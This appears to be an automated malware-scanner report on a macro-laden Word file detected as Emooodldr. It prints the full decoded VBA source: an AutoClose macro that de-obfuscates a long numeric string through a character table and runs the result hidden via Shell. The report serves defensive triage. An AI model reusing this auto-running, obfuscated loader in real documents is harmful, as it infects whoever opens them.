MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The file is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. Static analysis revealed VBA macros, including an Auto_Close macro and a call to the Shell() function. The script attempts to execute a deobfuscated string, likely a second-stage payload, which is characteristic of the Emooodldr family.
Heuristics 6
-
ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2436 bytes |
SHA-256: 8b9488b32dcc0c8ef025852e079d51e90ac55091d77bf04578e04f26db729337 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function coppia(positivo As Integer) As String
Dim civile() As Variant
civile = Array("s", ")", "T", "O", "?", "u", "X", "-", "h", "d", "$", "E", ",", "/", "W", "f", "o", "g", "m", "r", "A", "(", "l", "P", "+", "I", "b", "3", "V", "t", "j", ";", "F", "i", "N", "n", "D", "1", "'", "4", "a", " ", "x", "y", "=", "w", "8", "e", "p", "H", "v", "B", "\", "S", "C", ".", "c", ":", "2")
Dim rischio As Integer
For rischio = LBound(civile) To UBound(civile)
If rischio = positivo Then
coppia = civile(rischio)
End If
Next
End Function
Function braccio(uragano As String)
uragano = StrConv(uragano, vbUnicode)
braccio = Split(Left(uragano, Len(uragano) - 1), vbNullChar)
End Function
Function supporto(stirpe As String) As String
Dim inter As Integer
Dim peggio As String
Dim mensola As Variant
mensola = braccio(Trim(stirpe))
For rischio = 0 To Len(stirpe)
If (rischio + 1) <= UBound(mensola) Then
Dim volatile As String
volatile = mensola(rischio)
rischio = rischio + 1
volatile = volatile + mensola(rischio)
peggio = peggio + coppia(Int(volatile))
End If
Next
supporto = peggio
End Function
Public Function pavone(andrea As String)
Shell andrea, 0
End Function
Sub AutoClose()
Call Application.Run("pavone", supporto("561809554742474113564148164547190008472222410711424756415143484000004107341623410754161818403509412134474507032630475629415343002947185534472955144726542233473529015536164535221640093233224721380829294857131340403509474717354047403543555616181335333516130005484719551809153812411047355057202323362002204124413852351843234728304955474247380131415329401929072319165647000041104735505720232336200220385235184323472830495547424738314121344745070326304756294153430029471855344729551447265422334735290155361645352216400953291933351721380829294857131340403509474717354047403543555616181300554808480433094400054847193801314125110621213447450703263047562941534300294718553447295514472654223347352901553616453522164009532919333517213808292948571313273755374639555827395537394613005548084838010131"))
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes |
SHA-256: ea4523ee991c62bbbd842fe3d83b73fedaf3d5aceed5c0d28a56640838ce3f3f |
|||
|
Detection
ClamAV:
Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.